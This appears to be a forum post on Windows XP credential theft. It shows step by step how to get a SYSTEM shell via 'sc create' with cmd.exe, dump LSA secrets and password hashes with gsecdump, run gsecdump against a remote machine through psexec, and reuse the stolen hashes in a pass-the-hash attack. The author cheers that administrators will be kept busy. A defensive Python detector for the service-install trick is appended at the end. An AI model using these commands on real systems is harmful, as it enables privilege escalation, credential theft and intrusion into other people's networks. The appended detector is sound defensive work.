To get a DOS Prompt as NT system:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS
------------

Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ]             show help
-a [ --dump_all ]         dump all secrets
-l [ --dump_lsa ]         dump lsa secrets
-w [ --dump_wireless ]    dump microsoft wireless connections
-u [ --dump_usedhashes ]  dump hashes from active logon sessions
-s [ --dump_hashes ]      dump hashes from SAM/AD

Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - [url]www.sysinternals.com[/url]

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LM hashes that can be easily broken with Rainbow Tables.

A tip: you can use iam from the pshtools toolkit to load the HASH information just captured with gsecdump into the local lsass process, which gives you a hash-injection attack. The foreigners really are good at this; administrators are going to be busy now. The LM/NT hashes obtained during ARP spoofing, and the ones obtained with gethash, actually never need to be cracked at all; it is purely a matter of using the tools. As the original article puts it well: no matter whether the password is 4 characters or 127, as long as you have the hash, it is 100% done.

Original source: [url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]

I had a look at the original source; it seems to be from /2007/03/16/. Depressing, what a gap.
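One defender-side use of the transcript above, as an added example that is not part of the original post or of any tool it names: a small Python detector over constructed, simplified service-install and service-failure records (Windows System-log event IDs 7045 and 7000) that flags a shell interpreter registered as a service image and raises severity when the same service then times out with error 1053, the exact sequence the post's transcript shows. The key=value log format and field names are assumptions made for this demo.

```python
"""Flag service installs that look like the 'sc create ... cmd.exe /K start' trick.
Added example, not code from the original post. Input is a constructed, simplified
text rendering of Windows System-log events 7045 (service installed) and 7000
(service failed to start); the key=value field names are assumptions for this demo."""
import re
from datetime import datetime
# Image-path checks. Interpreters are almost never a legitimate service image, and
# 'cmd.exe /K start' additionally spawns a console that outlives the failed start.
CHECKS = [
    (re.compile(r"\\(cmd|powershell|pwsh|wscript|cscript|mshta)\.exe\b", re.I),
     "shell interpreter as service image"),
    (re.compile(r"/[kc]\s+start\b", re.I), "spawns a detached console (/K start)"),
]
FIELD = re.compile(r'(\w+)=("([^"]*)"|\S+)')

# Constructed sample events (not real telemetry); the second install mirrors the post.
SAMPLE_LOG = """\
2007-03-16T10:00:00 EventID=7045 ServiceName=Spooler ImagePath="C:\\WINDOWS\\system32\\spoolsv.exe" Account=LocalSystem
2007-03-16T10:01:02 EventID=7045 ServiceName=shellcmdline ImagePath="C:\\WINDOWS\\system32\\cmd.exe /K start" Account=LocalSystem
2007-03-16T10:01:33 EventID=7000 ServiceName=shellcmdline Error=1053
2007-03-16T10:05:00 EventID=7045 ServiceName=backupagent ImagePath="C:\\Program Files\\Backup\\agent.exe" Account=LocalSystem
2007-03-16T10:05:40 EventID=7000 ServiceName=backupagent Error=1053
"""

def parse(line: str) -> dict:
    ts, _, rest = line.partition(" ")  # '<iso-timestamp> key=value key="quoted value" ...'
    rec = {k: (quoted or raw) for k, raw, quoted in FIELD.findall(rest)}
    rec["ts"] = datetime.fromisoformat(ts)
    return rec

def find_shell_services(log_text: str, window_s: int = 120) -> list:
    """Medium: a CHECKS hit on the service image. High: the same service then fails
    with error 1053 within window_s, since a non-service binary never reports to the SCM."""
    suspicious, findings = {}, []
    for line in filter(str.strip, log_text.splitlines()):
        rec = parse(line)
        if rec["EventID"] == "7045":
            reasons = [msg for rx, msg in CHECKS if rx.search(rec["ImagePath"])]
            if reasons:
                finding = {"service": rec["ServiceName"], "image": rec["ImagePath"],
                           "account": rec.get("Account", "?"), "reasons": reasons, "severity": "medium"}
                suspicious[rec["ServiceName"]] = (rec["ts"], finding)
                findings.append(finding)
        elif rec["EventID"] == "7000" and rec.get("Error") == "1053":
            hit = suspicious.get(rec["ServiceName"])
            if hit and (rec["ts"] - hit[0]).total_seconds() <= window_s:
                hit[1]["reasons"].append("start timed out (1053) right after install")
                hit[1]["severity"] = "high"
    return findings
```

A legitimate service that times out (backupagent in the sample) is not flagged on its own, so the 1053 correlation only strengthens an image-path hit rather than generating alerts by itself.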